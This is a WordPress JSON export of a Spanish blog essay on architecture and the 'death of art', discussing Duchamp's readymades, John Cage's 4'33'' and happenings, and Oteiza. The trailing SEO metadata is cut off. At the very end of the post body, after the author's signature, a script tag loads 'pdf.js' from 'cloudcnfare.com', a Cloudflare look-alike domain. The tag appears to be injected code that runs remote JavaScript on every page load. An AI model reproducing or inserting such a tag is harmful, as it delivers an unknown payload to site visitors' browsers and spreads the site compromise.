{"id":21317,"date":"2018-09-28T00:01:37","date_gmt":"2018-09-27T22:01:37","guid":{"rendered":"http:\/\/veredes.es\/blog\/?p=21317"},"modified":"2022-02-09T17:54:35","modified_gmt":"2022-02-09T16:54:35","slug":"la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa","status":"publish","type":"post","link":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/","title":{"rendered":"La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa"},"content":{"rendered":"<p><\/p>\n<p style=\"text-align: justify;\">Las vanguardias art\u00edsticas siempre han mirado a la arquitectura de una manera ambigua. Por una parte, los artistas (pintores, escultores, fot\u00f3grafos, poetas, m\u00fasicos&#8230;) han tenido siempre colgada la etiqueta de chisgarabises, y han buscado con af\u00e1n meter en su\u00a0<i>troupe<\/i>\u00a0a alg\u00fan arquitecto, que parec\u00eda darle respetabilidad al grupo o movimiento que fuese. (Un arquitecto tiene sensibilidad art\u00edstica, pero adem\u00e1s sabe multiplicar, incluso con decimales).<\/p>\n<p style=\"text-align: justify;\">Por otra parte, el arte de vanguardia tiene siempre algo de ef\u00edmero, de burbujeante fugaz. Incluso la escultura abandona los materiales tradicionales y experimenta con papel, madera, chapa, alambre, etc. La arquitectura es mucho m\u00e1s s\u00f3lida y duradera. Adem\u00e1s, la arquitectura es mucho m\u00e1s grande y, sobre todo, hace ciudad. Es decir: hace ambiente, espacio urbano y humano. Es escenario de la vida de la gente, e influye en ella. Por eso la arquitectura sirve como abanderado y como relaciones p\u00fablicas del grupo art\u00edstico al que pertenece, y al que representa ante la sociedad.<\/p>\n<p style=\"text-align: justify;\">Pero contra todo esto, tambi\u00e9n hay que decir que muchos \u00abartistas puros\u00bb siempre han visto con malos ojos la inclusi\u00f3n de arquitectos en sus grupos, porque desvirtuaban el sentido de su movimiento.<\/p>\n<p style=\"text-align: justify;\">Haciendo una simplificaci\u00f3n muy grosera, los movimientos \u00abconstructivos\u00bb (<i>De Stijl<\/i>, Bauhaus, Constructivismo, etc.) han sido siempre muy arquitect\u00f3nicos y muy para arquitectos (aunque\u00a0<b>Van der Leck<\/b>\u00a0y\u00a0<a href=\"http:\/\/es.wikipedia.org\/wiki\/Piet_Mondrian\"><b>Mondrian<\/b><\/a>\u00a0se cabreasen). Intentaban ordenar el mundo y se val\u00edan de la geometr\u00eda, el orden, el rigor&#8230; Justo lo que un arquitecto necesitaba. Pero los movimientos \u00abdisolventes\u00bb (Expresionismo, Dad\u00e1, Surrealismo, etc.) ni han gustado a los arquitectos ni tampoco los han querido. (No obstante, algunos han buscado la forma, si fuera posible, de \u00abconstruir el caos\u00bb, de plasmar met\u00f3dicamente el cachondeo).<\/p>\n<p style=\"text-align: justify;\">Un artista dad\u00e1 al que nos referimos en la anterior entrada,\u00a0<a href=\"https:\/\/www.marcelduchamp.net\/\"><b>Marcel Duchamp<\/b><\/a>, acab\u00f3 con el arte. No fue el \u00fanico: Hubo bastantes artistas que acabaron con el arte.<\/p>\n<p style=\"text-align: justify;\">Duchamp pens\u00f3 que si un objeto existente se sacaba de su contexto y se presentaba como obra de arte, solo por eso ser\u00eda una obra de arte.<\/p>\n<p style=\"text-align: justify;\">Hizo un agujero en el asiento de un taburete e insert\u00f3 una rueda de bicicleta con su horquilla:<\/p>\n<figure id=\"attachment_70358\" aria-describedby=\"caption-attachment-70358\" style=\"width: 640px\" class=\"wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-70358\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg\" alt=\"M. Duchamp \" width=\"640\" height=\"640\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg 915w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap-300x300.jpg 300w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap-150x150.jpg 150w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><figcaption id=\"caption-attachment-70358\" class=\"wp-caption-text\"><span style=\"color: #999999;\">M. Duchamp<\/span><\/figcaption><\/figure>\n<p style=\"text-align: justify;\">Hala, ya est\u00e1. Obra de arte. \u00bfPor qu\u00e9? Porque no serv\u00eda ni para sentarse ni para rodar. Porque era la suma de dos objetos existentes que se interfer\u00edan mutuamente para perder su uso y su sentido. Al no servir ya para nada, serv\u00edan para pensar, para quedarse perplejo, para indignarse, para poner a parir al autor, etc. (Todas ellas son funciones de la obra de arte).<\/p>\n<p style=\"text-align: justify;\">Hizo otra cosa: Tom\u00f3 un urinario y lo present\u00f3 a una exposici\u00f3n en otra postura (horizontal en vez de vertical), con un t\u00edtulo que indicaba otra funci\u00f3n (<i>Fuente<\/i>) y, sobre todo, firmado (con el seud\u00f3nimo R. Mutt) y fechado (1917).<\/p>\n<figure id=\"attachment_70359\" aria-describedby=\"caption-attachment-70359\" style=\"width: 640px\" class=\"wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-70359\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap-Fuente-1917-1024x895.jpg\" alt=\"Marcel Duchmap. Fuente (1917)\" width=\"640\" height=\"559\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap-Fuente-1917-1024x895.jpg 1024w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap-Fuente-1917-300x262.jpg 300w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap-Fuente-1917.jpg 1200w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><figcaption id=\"caption-attachment-70359\" class=\"wp-caption-text\"><span style=\"color: #999999;\">Marcel Duchmap. Fuente (1917)<\/span><\/figcaption><\/figure>\n<p style=\"text-align: justify;\">La desfachatez consisti\u00f3 en que con tan solo ese gesto el urinario se convert\u00eda en obra de arte. Su presentaci\u00f3n a una exposici\u00f3n le daba el cach\u00e9 de arte, as\u00ed como su firma y fecha. Su cambio de posici\u00f3n y de uso produc\u00eda una excitante\u00a0<a href=\"http:\/\/arquitectamoslocos.blogspot.com.es\/2010\/12\/fision-semantica.html\"><b>fisi\u00f3n sem\u00e1ntica<\/b><\/a>\u00a0que abr\u00eda nuevas puertas a nuevas expectativas e interpretaciones.<\/p>\n<p style=\"text-align: justify;\">Una vez hecho esto, ya no hab\u00eda nada m\u00e1s que hacer.<\/p>\n<blockquote>\n<p style=\"text-align: justify;\">\u00abArte es todo lo que el artista dice que es arte\u00bb.<\/p>\n<\/blockquote>\n<p style=\"text-align: justify;\">Estupendo, pero ante semejante afirmaci\u00f3n cabe la siguiente pregunta:<\/p>\n<blockquote>\n<p style=\"text-align: justify;\">\u00ab\u00bfY qui\u00e9n es artista?\u00bb<\/p>\n<\/blockquote>\n<p style=\"text-align: justify;\">Pregunta que tiene una respuesta evidente:<\/p>\n<blockquote>\n<p style=\"text-align: justify;\">\u00abArtista es todo aquel que hace arte\u00bb.<\/p>\n<\/blockquote>\n<p style=\"text-align: justify;\">Este c\u00edrculo vicioso tautol\u00f3gico no tiene salida. Y lo bueno es que es verdad.<\/p>\n<p style=\"text-align: justify;\">Yo me siento artista, yo propongo un objeto, un acto, un poema, un ruido, etc, como obra de arte, y eso suscita inmediatamente cr\u00edticas, valoraciones, respuestas, indiferencia, reacciones, etc. Justo lo que suscita toda obra de arte. Por lo tanto, he hecho arte. Por lo tanto, soy artista. \u00bfCon mucho talento, con poco? \u00bfSoy un buen artista, soy malo?<\/p>\n<blockquote>\n<p style=\"text-align: justify;\"><strong>\u00a1No me fastidi\u00e9is! \u00a1No me veng\u00e1is con juicios, con valoraciones! \u00a1No se\u00e1is retr\u00f3grados burgueses!<\/strong><\/p>\n<\/blockquote>\n<p style=\"text-align: justify;\">Duchamp era un provocador. Los dos ejemplos que acabamos de ver son dos intentos (logrados) de llevar el arte al abismo, de ponerlo en el disparadero y no darle opci\u00f3n. Pero era, como dijimos, un provocador aburrido, un hombre tranquilo. No quer\u00eda salir airoso, no quer\u00eda triunfar, no quer\u00eda demostrar nada, ni tener raz\u00f3n, ni nada. Una vez hundido el arte, se retir\u00f3 a jugar al ajedrez. Nunca quiso explotar su fama, ni ganar dinero, ni escandalizar a nadie. Sencillamente, ya no hab\u00eda nada m\u00e1s que decir.<\/p>\n<p style=\"text-align: justify;\">Como dijimos, mucha gente sigui\u00f3 esa l\u00ednea. Entre ellos, el m\u00fasico\u00a0<a href=\"https:\/\/johncage.org\/\"><b>John Cage<\/b><\/a>. Leo en algunas biograf\u00edas que en Europa estudi\u00f3 arquitectura y piano, pero no lo puedo confirmar. Lo que s\u00ed parece seguro es que la arquitectura le interesaba de alguna forma. Y \u00e9l\u00a0<a href=\"http:\/\/issuu.com\/mj28\/docs\/musica_y_arquitectura\">ha interesado a los arquitectos<\/a>\u00a0de muchas formas.<\/p>\n<p style=\"text-align: justify;\">Aparte de sus experimentos con sonidos y silencios, se le tiene por el creador del primer\u00a0<a href=\"http:\/\/es.wikipedia.org\/wiki\/Happening\">happening<\/a>, que, en plena improvisaci\u00f3n simult\u00e1nea y des-coordinada, des-compone las evoluciones de los diversos agentes intervinientes en el tiempo y en el espacio.<\/p>\n<p style=\"text-align: justify;\">Sus partituras traman la aleatoriedad. No la organizan, la exponen. Curiosamente, tambi\u00e9n eso es una forma de no-organizar el espacio.<\/p>\n<figure id=\"attachment_70360\" aria-describedby=\"caption-attachment-70360\" style=\"width: 640px\" class=\"wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-70360\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-cage-1024x666.jpg\" alt=\"John Cage\" width=\"640\" height=\"416\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-cage-1024x666.jpg 1024w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-cage-300x195.jpg 300w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-cage-160x105.jpg 160w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-cage.jpg 1200w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><figcaption id=\"caption-attachment-70360\" class=\"wp-caption-text\"><span style=\"color: #999999;\">John Cage<\/span><\/figcaption><\/figure>\n<p style=\"text-align: justify;\">John Cage est\u00e1 lleno de sugerencias para los arquitectos. Agradezco infinitamente los comentarios de los lectores de la anterior entrada. Todos merecen re-comentario.<\/p>\n<p style=\"text-align: justify;\">MJGE dice que un posible equivalente arquitect\u00f3nico a la apertura de 4&#8217;33\u00bb ser\u00eda dejar un mero contenedor para que cada usuario lo completara. Estoy de acuerdo. (Me recuerda en algo a una idea de <a href=\"http:\/\/www.arquitectamoslocos.blogspot.com.es\/2011\/08\/una-ocurrencia-potente.html\" target=\"_blank\" rel=\"noopener noreferrer\">O\u00edza<\/a>). Pero tambi\u00e9n podr\u00eda ser que la obra arquitect\u00f3nica fuera lo suficientemente silenciosa, discreta, neutra, para que cada usuario viviera sus propias experiencias. O tambi\u00e9n que cada obra tuviera un cierto grado de imprevisibilidad y aleatoriedad que complicara, o sofisticara, la habitaci\u00f3n humana en ella. No s\u00e9. El ejemplo de Cage abre muchos vectores.<\/p>\n<p style=\"text-align: justify;\">Programa 3.6. menciona las partituras pl\u00e1sticas de Cage, de las que he buscado los ejemplos que he puesto ah\u00ed arriba. S\u00ed. Matrices organizativas, planos t\u00e1cticos, esquemas de batallas o de \u00abacciones program\u00e1ticas\u00bb.<\/p>\n<p style=\"text-align: justify;\">Francis, un no-arquitecto atento a la cultura, inteligente y curioso, ironiza con la falta de conexi\u00f3n entre el arte y el p\u00fablico, y habla del disfrute del arte y del af\u00e1n de entenderlo. Lamentablemente, tanto una como otra cosa son cada vez m\u00e1s escurridizas. Pero ambas, en definitiva, generan ocasiones para asomarnos a nosotros mismos. Por eso seguimos yendo a los museos.<\/p>\n<p style=\"text-align: justify;\">Seguramente no haya que insistir mucho para constatar la muerte del arte. Las vanguardias exploraron todos los caminos, y los recorrieron hasta el final, hasta el agotamiento. La conclusi\u00f3n es l\u00facida, indicutible. Se han alcanzado los \u00faltimos objetivos. La guerra ha terminado.<\/p>\n<p style=\"text-align: justify;\">Pero entonces, como dice\u00a0<a href=\"https:\/\/www.museooteiza.org\/\"><b>Oteiza<\/b><\/a>, el arte abandona su camino experimental y se da a la comunidad, se hace social. Y, en cierto modo, se hace arquitectura. La arquitectura no es arte (al menos no es un arte puro; de esto hablaremos otro d\u00eda). La arquitectura toma el cad\u00e1ver del arte y lo entierra. Y, como ha aprendido lo suficiente de \u00e9l y de todo su proceso, se hace espacio, se hace ciudad, se hace comunidad, y se entrega a la ciudadan\u00eda.<\/p>\n<p style=\"text-align: justify;\">La buena arquitectura toma ecos del silencio de 4&#8217;33\u00bb y de la alagarab\u00eda de los happenings de John Cage, se abre, fluye y ofrece el espacio a la experiencia humana. Porque solo sirve para estar al servicio de la experiencia humana.<\/p>\n<p><iframe loading=\"lazy\" title=\"John Cage&#039;s 4&#039;33&quot;\" width=\"696\" height=\"522\" src=\"https:\/\/www.youtube.com\/embed\/JTEFKFiXSx4?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/p>\n<p>Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa<br \/>\nDoctor Arquitecto y autor de<em>\u00a0Arquitectamos locos?<\/em><br \/>\nToledo \u00b7 abril\u00a02012<\/p>\n<p><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Las vanguardias art\u00edsticas siempre han mirado a la arquitectura de una manera ambigua. Por una parte, los artistas (pintores, escultores, fot\u00f3grafos, poetas, m\u00fasicos&#8230;) han tenido siempre colgada la etiqueta de chisgarabises, y han buscado con af\u00e1n meter en su\u00a0troupe\u00a0a alg\u00fan arquitecto, que parec\u00eda darle respetabilidad al grupo o movimiento que fuese. (Un arquitecto tiene sensibilidad [&hellip;]<\/p>\n","protected":false},"author":33,"featured_media":70358,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[568,5951],"tags":[12448,12449,155,158,12094,199,202,367,4546,4529,404,3032,508,5885,1595,4355,969,3653,4356,4390,12466,4533,1335],"class_list":{"0":"post-21317","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-faro","8":"category-slider-principal","9":"tag-arquitectura","10":"tag-arte","11":"tag-arte-contemporaneo","12":"tag-artes-plasticas","13":"tag-bart-van-der-leck","14":"tag-bauhaus","15":"tag-bellas-artes","16":"tag-constructivismo","17":"tag-constructivismo-ruso","18":"tag-dada","19":"tag-dadaismo","20":"tag-de-stijl","21":"tag-escultura","22":"tag-expresionismo","23":"tag-francisco-javier-saenz-de-oiza","24":"tag-john-cage","25":"tag-jorge-oteiza","26":"tag-jose-ramon-hernandez-correa","27":"tag-marcel-duchamp","28":"tag-piet-mondrian","29":"tag-pintura","30":"tag-surrealismo","31":"tag-vanguardia"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa - veredes<\/title>\n<meta name=\"description\" content=\"Toda la informaci\u00f3n sobre: [:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:]\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:] - veredes\" \/>\n<meta property=\"og:description\" content=\"Toda la informaci\u00f3n sobre: [:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/\" \/>\n<meta property=\"og:site_name\" content=\"veredes, arquitectura y divulgaci\u00f3n\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/joseramon.hernandezcorrea\" \/>\n<meta property=\"article:published_time\" content=\"2018-09-27T22:01:37+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-02-09T16:54:35+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"915\" \/>\n\t<meta property=\"og:image:height\" content=\"915\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/arquitectamos\" \/>\n<meta name=\"twitter:site\" content=\"@veredes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"20 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/\"},\"author\":{\"name\":\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/eefca3204fa5a4349162c2869bee6c49\"},\"headline\":\"La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\",\"datePublished\":\"2018-09-27T22:01:37+00:00\",\"dateModified\":\"2022-02-09T16:54:35+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/\"},\"wordCount\":3976,\"commentCount\":1,\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/09\\\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg\",\"keywords\":[\"arquitectura\",\"arte\",\"arte contemporaneo\",\"artes pl\u00e1sticas\",\"Bart van der Leck\",\"Bauhaus\",\"bellas artes\",\"constructivismo\",\"constructivismo ruso\",\"dad\u00e1\",\"dada\u00edsmo\",\"De Stijl\",\"escultura\",\"expresionismo\",\"Francisco Javier S\u00e1enz de Oiza\",\"John Cage\",\"Jorge Oteiza\",\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\",\"Marcel Duchamp\",\"Piet Mondrian\",\"pintura\",\"surrealismo\",\"vanguardia\"],\"articleSection\":[\"faro\",\"slider principal\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/\",\"name\":\"[:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:] - veredes\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/09\\\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg\",\"datePublished\":\"2018-09-27T22:01:37+00:00\",\"dateModified\":\"2022-02-09T16:54:35+00:00\",\"description\":\"Toda la informaci\u00f3n sobre: [:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:]\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/#primaryimage\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/09\\\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/09\\\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg\",\"width\":915,\"height\":915,\"caption\":\"M. Duchamp\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"name\":\"veredes, arquitectura y divulgaci\u00f3n\",\"description\":\"veredes\",\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"alternateName\":\"veredes\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/veredes.es\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\",\"name\":\"veredes, arquitectura y divulgaci\u00f3n\",\"alternateName\":\"veredes\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"width\":140,\"height\":54,\"caption\":\"veredes, arquitectura y divulgaci\u00f3n\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/veredesArquitecturayDivulgacion\\\/\",\"https:\\\/\\\/x.com\\\/veredes\",\"https:\\\/\\\/instagram.com\\\/veredes\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/veredes-arquitectura-y-divulgacion\\\/\",\"https:\\\/\\\/es.pinterest.com\\\/veredes\\\/\",\"https:\\\/\\\/www.tumblr.com\\\/veredes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/eefca3204fa5a4349162c2869bee6c49\",\"name\":\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez 